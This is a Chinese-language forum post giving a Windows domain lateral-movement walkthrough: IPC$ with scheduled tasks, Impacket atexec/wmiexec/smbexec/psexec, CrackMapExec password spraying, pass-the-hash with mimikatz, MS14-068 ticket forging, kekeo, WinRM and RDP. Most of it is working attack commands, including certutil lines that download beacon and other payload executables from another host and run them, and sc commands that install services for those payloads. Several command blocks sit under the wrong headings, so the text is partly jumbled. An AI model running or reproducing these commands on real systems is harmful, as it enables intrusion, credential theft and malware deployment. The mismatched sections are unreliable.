ToB企服应用市场:ToB评测及商务社交产业平台

标题: 内网安全-横向移动(1) [打印本页]

---

作者: 莫张周刘王    时间: 2023-2-27 18:17
标题: 内网安全-横向移动(1)
内网安全-横向移动(1)

IPC

1. IPC是专用管道，可以实现对远程计算机的访问，
3. 需要使用目标系统用户的账号密码，使用139、445端口。
5. \1. 建立IPC链接到目标主机
7. \2. 拷贝要执行的命令脚本到目标主机
9. \3. 查看目标时间，创建计划任务（at、schtasks）定时执行拷贝到的脚本
11. \4. 删除IPC链接
13. net use \\server\ipc$ "password" /user:username # 工作组
15. net use \\server\ipc$ "password" /user:domain\username #域内
17. dir \\xx.xx.xx.xx\C$\        # 查看文件列表
19. copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
21. copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
23. net use \\xx.xx.xx.xx\C$\1.bat /del # 删除IPC
25. net view xx.xx.xx.xx        # 查看对方共享
27. \#建立IPC常见的错误代码
29. （1）5：拒绝访问，可能是使用的用户不是管理员权限，需要先提升权限
31. （2）51：网络问题，Windows 无法找到网络路径
33. （3）53：找不到网络路径，可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题
35. （4）67：找不到网络名，本地Lanmanworkstation服务未启动，目标删除ipc$
37. （5）1219：提供的凭据和已存在的凭据集冲突，说明已建立IPC$，需要先删除
39. （6）1326：账号密码错误
41. （7）1792：目标NetLogon服务未启动，连接域控常常会出现此情况
43. （8）2242：用户密码过期，目标有账号策略，强制定期更改密码
45. \#建立IPC失败的原因
47. （1）目标系统不是NT或以上的操作系统
49. （2）对方没有打开IPC$共享
51. （3）对方未开启139、445端口，或者被防火墙屏蔽
53. （4）输出命令、账号密码有错误

复制代码

at命令=Windows2012

基本操作和at命令一样

1. shell net use \\192.168.138.138\ipc$ "123dc.com" /user:sun.com\ad
2. ministrator # 建立ipc连接

复制代码

然后复制粘贴到C盘后，创建任务

1. shell copy beacon.exe \\192.168.138.138\c$ #拷贝执行文件到目标机器

复制代码

1. at \\192.168.138.138 15:47 c:\beacon.exe  #添加计划任务

复制代码

上线

1. net use \\192.168.138.138\ipc$ "123dc.com" /user:sun.com\ad
3. ministrator # 建立ipc连接：
5. copy beacon.exe \\192.168.138.138\c$ #复制文件到其C盘

复制代码

Impacket-atexec

该工具是一个半交互的工具，适用于Webshell下，Socks代理下;
在渗透利用中可以收集用户名、明文密码、密码hash、远程主机等做成字典，批量测试
python版本如果拿下的入口机有python版本就可以用或者挂代理使用，exe版本可以上传使用或者挂代理使用
python版本 https://github.com/SecureAuthCorp/impacket

1. schtasks /create /s 192.168.138.138 /ru "SYSTEM" /tn beacon /sc DAILY /tr c:\beacon.exe /F #创beacon任务对应执行文件

复制代码

exe版本 https://gitee.com/RichChigga/impacket-examples-windows

1. schtasks /run /s 192.168.138.138 /tn beacon /i #运行beacon任务

复制代码

演示

1. schtasks /delete /s 192.168.138.138 /tn beacon /f#删除beacon任务

复制代码

如何上线？因为拿下的正好为web服务器权限，将木马上传到网站根目录中，然后去下载即可

1. python atexec.py god/administrator:Admin12345@192.168.3.21 "ver"
3. python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"

复制代码

1. CS本地用户明文连接：
3. shell atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"
5. CS域内用户明文连接：
7. shell atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"
9. CS域内本地用户明文密文连接：
11. shell atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"
13. shell atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

复制代码

然后就可以上线了

Wmi

WMI是通过135端口进行利用，支持用户名明文或者hash的方式进行认证，
并且该方法不会在目标日志系统留下痕迹。

1. shell atexec.exe sun/administrator:123dc.com@192.168.138.138 "whoami"

复制代码

和上面的一种方法横向思路一样，下载web后门然后执行
wmiexec-impacket套件

1. shell atexec.exe sun/administrator:123dc.com@192.168.138.138 "certutil.exe -urlcache -split -f http://192.168.138.136/beacon.exe c:/exploit.exe"

复制代码

域内用户连接执行命令

1. shell atexec.exe sun/administrator:123dc.com@192.168.138.138 "c:/exploit.exe"

复制代码

SMB

利用SMB服务可以通过明文或hash传递来远程执行，条件445服务端口开放。

1. wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
3. wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe c:/beacon.exe"

复制代码

演示：

1. wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
3. wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
5. 下载后门：
7. wmiexec ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
9. 执行后门：
11. wmiexec ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c c:/beacon.exe"

复制代码

然后就是些常规思路上cs了
cs自带横向功能

然后即可上线

smbexec-impacket套件

上传至拿下权限的机子，

1. wmiexec.exe sun/administrator:123dc.com@192.169.138.138 "whoami"

复制代码

横向移动

1. psexec
3. 内部：(交互式 windows官方工具)
5. psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd
7. 外部：(交互式 外人开发的工具)
9. psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

复制代码

还有个内置的services，单执行

1. psexec64.exe \\192.168.138.138 -u sun\administrator -p 123dc.com -s cmd

复制代码

cme密码喷射

开启个socket代理


常见用法

1. 使用方法：
2. smbexec ./administrator:admin!@#45@192.168.3.32
4. smbexec god/administrator:admin!@#45@192.168.3.32
6. smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
8. smbexec -hashes :518b98ad4178a53695dc997aa02d455c god/administrator@192.168.3.32smbexec -hashes god/administrator:518b98ad4178a53695dc997aa02d455c@192.168.3.32

复制代码

1. smbexec sun/administrator:123dc.com@192.168.138.138

复制代码

1. smbexec sun/administrator:123dc.com@192.168.138.138

复制代码

然后常规思路就是下马上线了
PTH

pass the hash（哈希传递攻击，简称pth）
PTH = Pass The Hash，通过密码散列值 (通常是NTLM Hash)来进行攻击。
在域环境中，用户登录计算机时使用的域账号，计算机会用相同本地管理员账号和密码。
因此，如果计算机的本地管理员账号和密码也是相同的，攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。另外注意在Window Server 2012 R2之前使用到的密码散列值是LM、NTLM，在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。
Mimikatz

1. 密码喷射域登录：
3. proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45'
5. 密码喷射本地登录：
7. proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth
9. 密码喷射本地登录命令执行：
11. proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'whoami' --local-auth
13. 密码喷射本地登录命令执行上线：
15. proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe' --local-auth
17. 密码喷射域登录命令执行上线：
19. proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe'
21. 密码喷射本地&域登录命令执行全自动上线：
23. proxychains python cme smb 192.168.3.21-32 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe'
25. proxychains python cme smb 192.168.3.21-32 -u administrator -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe' --local-auth
27. 域用户登录PTH
28. proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c #域用户HASH登录
30. proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth #本地用户HASH登录

复制代码

抓取哈希

1. proxychains crackmapexec smb 192.168.138.138 -u administrator -p '123dc.com'

复制代码

然后就是常规思路copy马子，上线了
impacket套件
使用方法
和之前使用明文密码差别不大直接梭哈即可

1. proxychains crackmapexec smb 192.168.138.138 -u administrator -p '123dc.com'

复制代码

PTK

pass the ticket（票据传递攻击，简称ptt）
PTK = Pass The Key，当系统安装了KB2871997补丁且禁用了NTLM的时候，
那我们抓取到的ntlm hash也就失去了作用，但是可以通过PTK的攻击方式获得权限。

1. mimikatz privilege::debug
3. sekurlsa::msv  
5. mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
7. net use \\192.168.3.32\c$
9. copy beacon.exe \\192.168.3.32\c$
11. sc \\sqlserver create bshell binpath= "c:\4.exe"
13. sc \\sqlserver start bshell

复制代码

PTT

漏洞-MS14068

1、漏洞-MS14068(webadmin权限)-利用漏洞生成的用户的新身份票据尝试认证
MS14-068是密钥分发中心（KDC）服务中的Windows漏洞。
它允许经过身份验证的用户在其Kerberos票证（TGT）中插入任意PAC。
该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。
用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证.
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/kekeo/releases

1. sekurlsa::pth /user:administrator /domain:192.168.138.138 /ntlm:a5217de68aec54a80510aa0769a419e5

复制代码

1. psexec -hashes :NTLM值 域名/域用户@域内ip地址
3. smbexec -hashes :NTLM值 域名/域用户@域内ip地址
5. wmiexec -hashes :NTLM值 域名/域用户@域内ip地址

复制代码

1. mimikatz sekurlsa::ekeys
3. mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值

复制代码

1. 获取SID值：shell whoami/user
3. 生成票据文件：shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45
5. 清除票据连接：
7. shell klist purge
9. 内存导入票据：
11. mimikatz kerberos::ptc TGT_webadmin@god.org.ccache
13. 连接目标上线：
15. shell dir \\OWA2010CN-GOD\c$
17. shell net use \\OWA2010CN-GOD\C$
19. copy beacon.exe \\OWA2010CN-GOD\C$
21. sc \\OWA2010CN-GOD create bindshell binpath= "c:\beacon.exe"
23. sc \\OWA2010CN-GOD start bindshell
25. 注意：成功不成功看DC域控漏洞补丁打没打

复制代码

1. shell whoami/user

复制代码

然后常规思路，copy马子，创建服务上线了
kekeo(高权限，需NTLM)

利用获取的NTLM生成新的票据尝试认证
因为当前主机肯定之前与其他主机连接过，所以本地应该生成了一些票据，
我们可以导出这些票据，然后再导入票据，利用。该方法类似于cookie欺骗
缺点：票据是有有效期的，所以如果当前主机在连接过域控的话，有效期内可利用。

1. shell ms14-068.exe -u administrator@sun.com -s S-1-5-21-3388020223-1982701712-4030140183-500  -d 192.168.138.138 -p 123dc.com

复制代码

mimikatz(高权限,需Ticket)

1. mimikatz kerberos::ptc TGT_administrator@sun.com.ccache

复制代码

WinRM&WinRS

WinRM代表Windows远程管理，是一种允许管理员远程执行系统管理任务的服务。
默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。
移动条件：双方都启用的Winrm rs的服务！
使用此服务需要管理员级别凭据。
Windows 2008 以上版本默认自动状态，Windows Vista/win7上必须手动启动；
Windows 2012之后的版本默认允许远程任意主机来管理。
思路和之前的横向方法，差不多，然后扫描开放5985端口的主机，抓取密码hash，横向看能不能梭哈

1. shell dir \\DC\c$

复制代码

RDP-明文&NTLM

远程桌面服务 支持明文及HASH连接
条件：对方开启RDP服务 远程桌面
思路和之前的横向方法，差不多，然后扫描开放3389端口的主机，抓取密码hash，横向看能不能梭哈

1. 生成票据：shell kekeo "tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"
3. 导入票据：shell kekeo "kerberos::ptt TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"
5. 查看票据：shell klist
7. 利用票据连接：shell dir \\owa2010cn-god\c$
9. 注意：成功不成功看ntlm哈希值的正确性

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4